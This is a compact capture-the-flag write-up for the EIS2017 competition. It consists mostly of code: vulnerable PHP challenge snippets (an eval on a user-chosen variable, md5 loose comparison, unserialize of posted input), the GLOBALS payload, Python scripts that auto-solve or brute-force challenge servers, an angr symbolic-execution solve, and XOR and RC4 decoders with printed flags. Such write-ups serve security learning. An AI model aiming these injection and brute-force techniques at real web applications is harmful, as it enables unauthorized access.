EIS2017 CTF writeup

<?php  
error_reporting(0);
include "flag1.php";
highlight_file(__file__);
if(isset($_GET['args'])){
    $args = $_GET['args'];
    if(!preg_match("/^\w+$/",$args)){
        die("args error!");
    }
    eval("var_dump($$args);");
}
paylaod：
/index.php?args=GLOBALS

import requests
url="http://202.120.7.220:2333/"
r=requests.get(url)
b=str(r.content).split('<br/>')[1].split('=<input type="text" name="v"/>')[0]
r=requests.post(url,data={'v':eval(b)})
print(r.text)

     $test=$_GET['userid']; $test=md5($test); 
   if($test != '0'){ 
              $this->error('用户名有误,请阅读说明与帮助！'); 
           }
$pwd =$this->_post("password");
$data_u = unserialize($pwd);
if($data_u['name'] == 'XX' && $data_u['pwd']=='XX')
    {
      print_r($flag);
    }

import requests
import threading  
url="http://202.112.26.124:8080/280a31eec4c62a893ad40a6508d207c8/index.php"
def main(code):
        PHPSESSID=requests.get(url).headers['Set-Cookie'].split(';')[0]
        header={'cookie':PHPSESSID}
        while(1):
                urla=url+'?code='+str(code)
                try:
                        r=requests.get(urla,headers=header)
                        if('wrong answer' not in r.text):
                                print(r.text)
                except:
                        pass
k=[278,332,653,841,394,783,210,153,93,334,749,179,841,394,783,188,299,537,724,612,27,334,749,179,188,299,537,119,913,605]
t=[]
print("loading....")
for i in k:
        t1 = threading.Thread(target=main, args=(str(i),))
        t.append(t1)
for th in t:
        th.start()

reverseme
    import logging
logging.getLogger('angr.surveyor').setLevel(logging.DEBUG)
import angr
def main():
    p = angr.Project("ReverseMe.exe")
    state = p.factory.blank_state(addr=0x004012E0 )
    state.stack_push(0xd0000010) # pointer to argv[1]
    state.stack_push(0xd0000000) # pointer to argv[0]
    state.stack_push(state.regs.esp) # argv
    state.stack_push(2) # argc
    state.stack_push(0x401f30) # address of main
    sm = p.factory.simgr(state)
    print "123"
    ex = sm.explore(find=0x00403D99, avoid=(0x00403DCF,0x00403E12,0x00403E01))
    if len(ex.found)>0:
        print "yes you got it"
        found=ex.found[0]
    print found.posix.dumps(0)
    print found.posix.dumps(1)
    #flag = s.se.eval(s.memory.load(flag_addr, 8), cast_to=str)
    #flag22 = s.se.eval(s.memory.load(flag2, 8), cast_to=str)
    # The flag is 'Math is hard!'
    #print("The flag is '{0}'".format(flag))
    #print("The flag is '{0}'".format(flag22))
    return 
if __name__ == "__main__":
    main()
#EIS{wadx_tdgk_aihc_ihkn_pjlm}

aa='GONDPHyGjPEKruv{{pj]X@rF'
bb=[0x0D,0x13,0x17,0x11,0x02,0x01,0x20,0x1D,0x0C,0x02,0x19,0x2F,0x17,0x2B,0x24,0x1F,0x1E,0x16,0x09,0x0F,0x15,0x27,0x13,0x26,0x0A,0x2F,0x1E,0x1A,0x2D,0x0C,0x22,0x04]
cc=[]
dd=''
print len(bb)
for i in range(len(aa)):
    cc.append(ord(aa[i])^bb[i])
    cc[i]-=72
    cc[i]^=0x55
    if (cc[i]>=0x41) and (cc[i]<=0x5a):
        cc[i]+=0x20
    elif (cc[i]>=0x61) and (cc[i]<=0x7a):
        cc[i]-=0x20
    dd+=chr(cc[i])
print dd
#EIS{wadx_tdgk_aihc_ihkn_pjlm}

# -*- coding: utf-8 -*-
def rc4(data,key):
        j=0
        s=range(256)
        for i in range(256):
                j=(j+s[i]+ord(key[i%len(key)]))%256
                s[i],s[j]=s[j],s[i]
        i=0
        j=0
        out=[]
        for char in data:
                i=(i+1)%256
                j=(j+s[i])%256
                s[i],s[j]=s[j],s[i]
                out.append(chr(ord(char)^s[(s[i]+s[j])%256]))
        return ''.join(out)
encodedata=rc4('\xca\xee\x86\x30\x48\xc4\xec\x56\x3d\x22\x2a\xbc\x9a\x95\x70\x23\x39\x76\x3b\xee\x09\x29\x2b\x01\x54\x00\x87\x5e\x37\x23\x3e\x79\x8b\x7b\xa9\x20\x78','hello world')
print encodedata
EIS{55a0a84f86a6ad40006f014619577ad3}